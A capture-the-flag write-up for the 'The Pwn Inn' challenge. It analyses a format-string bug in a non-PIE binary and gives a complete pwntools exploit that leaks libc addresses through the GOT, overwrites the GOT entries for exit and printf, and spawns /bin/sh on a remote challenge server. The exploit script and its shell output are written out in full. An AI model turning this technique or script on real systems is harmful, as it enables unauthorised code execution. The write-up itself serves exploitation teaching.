The Pwn Inn

2021-02-01

Recon

First things first, let’s check what mitigations are enabled in the binary so that we can get a clear idea of what exploits are doable.

$ checksec --file=./the_pwn_inn
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   82) Symbols       No    0               2               ./the_pwn_inn

I should add that the hint for this challenge includes: We've had many famous faces stay in our Inn, with gets() and printf() rating us 5 stars.. If we take into account that the binary is not position independent and that the GOT is writeable, we get a very clear idea of what the exploit will be like. But let’s not get ahead of ourselves, let’s actually check what the code looks like:

If you’re unfamiliar with the GOT and how it works, it’s highly recommended that you go read a bit about it before going through this write-up. You can read my other write-up on “external” from this same CTF for a quick and dirty introduction.

: int main (int argc, char **argv, char **envp);
; var int64_t canary @ rbp-0x8
0x00401328      push    rbp
0x00401329      mov     rbp, rsp
0x0040132c      sub     rsp, 0x10
0x00401330      mov     rax, qword fs:[0x28]
0x00401339      mov     qword [canary], rax
0x0040133d      xor     eax, eax

		; ignore_me_init_buffering()
0x0040133f      mov     eax, 0
0x00401344      call    ignore_me_init_buffering ; sym.ignore_me_init_buffering

		; ignore_me_init_signal()
0x00401349      mov     eax, 0
0x0040134e      call    ignore_me_init_signal ; sym.ignore_me_init_signal

		; puts("Welcome to the pwn inn! We hope you enjoy your stay. What's your name? ")
0x00401353      lea     rdi, str.Welcome_to_the_pwn_inn__We_hope_that_you_enjoy_your_stay._What_s_your_name ; 0x402040 ; const char *s
0x0040135a      call    puts       ; sym.imp.puts ; int puts(const char *s)

		; vuln()
0x0040135f      mov     eax, 0
0x00401364      call    vuln       ; sym.vuln

		; [canary check]
0x00401369      mov     eax, 0
0x0040136e      mov     rdx, qword [canary]
0x00401372      sub     rdx, qword fs:[0x28]
0x0040137b      je      0x401382
0x0040137d      call    __stack_chk_fail ; sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)

		; return 0
0x00401382      leave
0x00401383      ret

; comments added for clarity

Ok, not much over there, let’s take a look at vuln then:

: vuln ();
; var char *format @ rbp-0x110
; var int64_t var_8h @ rbp-0x8
0x004012c4      push    rbp
0x004012c5      mov     rbp, rsp
0x004012c8      sub     rsp, 0x110
0x004012cf      mov     rax, qword fs:[0x28]
0x004012d8      mov     qword [var_8h], rax
0x004012dc      xor     eax, eax

		; fgets(format, 0x100, stdin)
0x004012de      mov     rdx, qword [stdin] ; obj.stdin__GLIBC_2.2.5
                                   ; 0x404090 ; FILE *stream
0x004012e5      lea     rax, [format]
0x004012ec      mov     esi, 0x100 ; 256 ; int size
0x004012f1      mov     rdi, rax   ; char *s
0x004012f4      call    fgets      ; sym.imp.fgets ; char *fgets(char *s, int size, FILE *stream)

		; printf("Welcome ")
0x004012f9      lea     rdi, str.Welcome ; 0x402037 ; const char *format
0x00401300      mov     eax, 0
0x00401305      call    printf     ; sym.imp.printf ; int printf(const char *format)

		; printf(format)
0x0040130a      lea     rax, [format]
0x00401311      mov     rdi, rax   ; const char *format
0x00401314      mov     eax, 0
0x00401319      call    printf     ; sym.imp.printf ; int printf(const char *format)

		; exit(1)
0x0040131e      mov     edi, 1     ; int status
0x00401323      call    exit

Well, this is interesting. We get to control a format string that will later be fed into printf. The only catch is that the format string is read via fgets, which doesn’t really like newlines (we’ll need to be careful with this when sending payloads).

Ok, first things first, we’ll want to get the version of the libc in use on remote. Once we have the libc, we can use offsets to calculate the address of system, given the address of some other function.

Getting the libc version

We’ve got only one printf before execution finishes (we will later see why this is not entirely true, but let’s roll with it for now), so we can use that one format string to make printf give us the content of some GOT entry. If we look at the format buffer, we can see that it is stored at the top of the stack when printf is called, that means that the contents of our buffer will be treated as the 7th parameter to printf (recall that under System V’s calling conventions rdi, rsi, rcx, r8 and r9 are the first 6 parameters, the 7th one is retrieved from the top of the stack, the 8th one is the second to top element of the stack, and so on). So we can ask printf to give us the string pointed to by the ‘8th parameter’ and then feed it the address of some GOT entry. Summing up, our malicious string will look something like this: "%7$sAAAA[addressOfGotEntryHere]" (remember that our buffer is at the top of the stack, that means that the 7th parameter is the string "%7$sAAAA", and the 8th parameter is [addressOfGotEntryHere], which should be 8 bytes long), this will trick printf into leaking libc addresses. Eventually the program is going to exit, but by that point we’ll have already leaked the address we wanted.

Here’s a quick crash-course from Georgia Tech on format string vulnerabilities and how they can be used to perform arbitrary memory read/writes, for those of you who are unfamiliar with it.

The code for this looks something like this:

def isValidInput(byteStr):
    return all([x != b'\x0a' for x in byteStr]) and len(byteStr) < 0x100

def leakLibcAddress(p, address):
    formatString = b'%7$s\x00\x00\x00\x00' + p64(address) # Use b'\x00' instead of b'A' so that
                                                          # the output doesn't get too cluttered

    if not isValidInput(formatString):
        p.error('The payload contains illegal bytes')
    
    p.sendline(formatString)
    p.recvuntil(b'Welcome ')
    res = p.recv(8)

    if len(res) < 0x8:
        res += (0x8 - len(res)) * b'\x00'

    return u64(res)

got = {
    'puts': 0x404020,
    'printf': 0x404030,
    'fgets': 0x404040,
    'setvbuf': 0x404050
}

for sym in got:
    p = remote(rhost, rport)
    p.recvuntil(b'name? \n')
    p.info(f'{sym} @ {hex(leakLibcAddress(p, got[sym]))}')
    p.close()

This will give us the address for each libc function used in the binary. The program will be executed multiple times so the libc might be loaded into a different page each time, but that doesn’t really matter since all we care about are the last twelve bits, which don’t have anything to do with the page at which the libc is loaded. This is an example output:

$ python3 exploit.py
[+] Opening connection to 185.172.165.118 on port 2626: Done
[*] puts @ 0x7f172a4235a0
[*] Closed connection to 185.172.165.118 port 2626
[+] Opening connection to 185.172.165.118 on port 2626: Done
[*] printf @ 0x7fc10ec2ae10
[*] Closed connection to 185.172.165.118 port 2626
[+] Opening connection to 185.172.165.118 on port 2626: Done
[*] fgets @ 0x7f1d2d6367b0
[*] Closed connection to 185.172.165.118 port 2626
[+] Opening connection to 185.172.165.118 on port 2626: Done
[*] setvbuf @ 0x7fb763c92e60
[*] Closed connection to 185.172.165.118 port 2626

Using the last twelve bits for each function, we can identify the libc version using some online libc database. The resulting version is: libc6_2.31-0ubuntu9_amd64. Ok, so given that information we now know that the address for system is equal to the address of printf minus 0xfa00.

Exploitation

Now that we have the offset between printf and system we can leak the address for printf again, but this time we will use it to locate system, and eventually call it. But first we need to find a way to execute a second printf, since vuln just doesn’t return. It is here that we can exploit the second intereseting property of printf: the fact that it can do arbitrary memory writes.

Normally when using printf to do arbitrary writes we’d need to keep an eye on the size of the buffer, but since the buffer in which our format string is stored is big enough, we don’t need to worry about sizes for now.

Let’s take a look at an example:

Suppose we wanted to make the GOT entry for exit point to 0, we could execute printf with "%7$llhAA[exitGotAddress]". This way we would not print anything to stdout, but make printf write the amount of written bytes (namely, 0) to the address pointed to by exitGotAddress. Of course we don’t want to write zero to the GOT entry for exit, but the idea is the same for any arbitrary number (using printf’s %.[n]u directive), as long as its decimal representation fits inside the format string alongside the desired address. Luckily, pwntools provides us with a function to generate these strings automatically.

So, using a format string like that we can make the GOT entry for exit point to the start of the vuln function. That way we can wrap vuln inside a ‘loop’ of sorts. Now that the vulnerable code will be executed an indefinite amount of times, we can proceed with the rest of the exploit. We can leak printf’s address by reading the GOT (using the code avobe) and get the address for system.

Once that’s done we need to actually call system. That can get a bit tricky, since there’s no return instruction, and creating a ROP would be painful since the stack is constantly growing (because the prologue for vuln keeps getting executed). The quick and dirty solution I came up with was: overwrite the address of printf with the one for system in the GOT entry for printf. Why would this work? Well, once we make printf ‘point’ to system, we will be asked to enter a string again, at that point we can enter something like "/bin/sh" (with a null byte at the end) and two calls to printf will be executed after that:

One will be printf("Welcome "), which will be equivalent to system("Welcome "). That will execute Welcome , since that’s most likely a non-existent program, it will just fail and return -1 or some error code (but the program itself won’t crash, that’s important to bear in mind).
The second one will be printf("/bin/sh"), which will be equivalent to system("/bin/sh"). That’s what we wanted from the very beginning!

Putting it all together

Let’s recap, here’s a quick sketch of the plan:

Leak as many libc addresses as possible (doesn’t matter if this gets done across different executions)
Get the libc version by looking at the 12 least significant bits of those addresses
Use the information from that libc to calculate the offset between system and printf

On the execution of the actual exploit:

Make exit point to vuln by overwriting the corresponding GOT entry
Leak the address of printf and use that to calculate the address of system
Overwrite the entry for printf in the GOT with the address of system
Send the string "/bin/sh\x00"

The code looks like this:

from pwn import *

context.update(os='linux', arch='amd64')

rhost = '185.172.165.118'
rport = 2626

def isValidInput(byteStr):
    return all([x != b'\x0a' for x in byteStr]) and len(byteStr) < 0x100

def leakLibcAddress(p, address):
    formatString = b'%7$s\x00\x00\x00\x00' + p64(address)

    if not isValidInput(formatString):
        p.error('The payload contains illegal bytes')
    
    p.sendline(formatString)
    p.recvuntil(b'Welcome ')
    res = p.recv(8)

    if len(res) < 0x8:
        res += (0x8 - len(res)) * b'\x00'

    return u64(res)

got = {
    'puts': 0x404020,
    'printf': 0x404030,
    'fgets': 0x404040,
    'setvbuf': 0x404050
}

#for sym in got:
#    p = remote(rhost, rport)
#    p.recvuntil(b'name? \n')
#    p.info(f'{sym} @ {hex(leakLibcAddress(p, got[sym]))}')
#    p.close()

p = remote(rhost, rport)

# Every time we send a payload, we need to make sure it doesn't
# contain newline characters, and that it doesn't exceed the buffe 
# size. This should all be into a separate helper function, but
# I was too lazy to do it the right way

# Also, after sending a "writing" format string we need to read
# exactly as many bytes as the number we wanted to write with the
# format string, so that the whole thing works more reliably and
# we don't have problems with timeouts, buffers, etc.

# Send the payload which will make exit point to vuln
closeLoopStr = fmtstr_payload(6, {0x404058: 0x4012c4})
if not isValidInput(closeLoopStr):
    p.error('Payload contains illegal bytes')
p.recvuntil(b'name? \n')
p.sendline(closeLoopStr)
p.recvuntil(b'Welcome ')
p.recv(0x4012c4)


# Leak printf address
p.recvuntil(b'name? \n')
printfAddr = leakLibcAddress(p, got['printf'])

p.info('printf @ ' + hex(printfAddr))
# Use the offset calculated previously
systemAddr = printfAddr - 0xfa00
p.info('system @ ' + hex(systemAddr))

# Make printf point to system
printf2systemStr = fmtstr_payload(6, {0x404030: systemAddr})
if not isValidInput(printf2systemStr):
    p.error('Payload contains illegal bytes')
p.recvuntil(b'name? \n')
p.sendline(printf2systemStr)
p.recvuntil(b'Welcome ')
p.recv(systemAddr)

# Send "/bin/sh"
p.recvuntil(b'name? \n')
p.sendline(b'/bin/sh\x00')

# Profit!
p.clean()
p.interactive()

And here it is in action:

$ python3 exploit.py
[+] Opening connection to 185.172.165.118 on port 2626: Done
[*] printf @ 0x7f0492f14e10
[*] system @ 0x7f0492f05410
[*] Switching to interactive mode
$ ls
flag.txt
lib
lib64
temp
the_pwn_inn
ynetd
$ cat flag.txt
**flag{GOTt4_b3_OVERWRITEing_th0s3_symb0ls_742837423}**
$

Post written by @OctavioGalland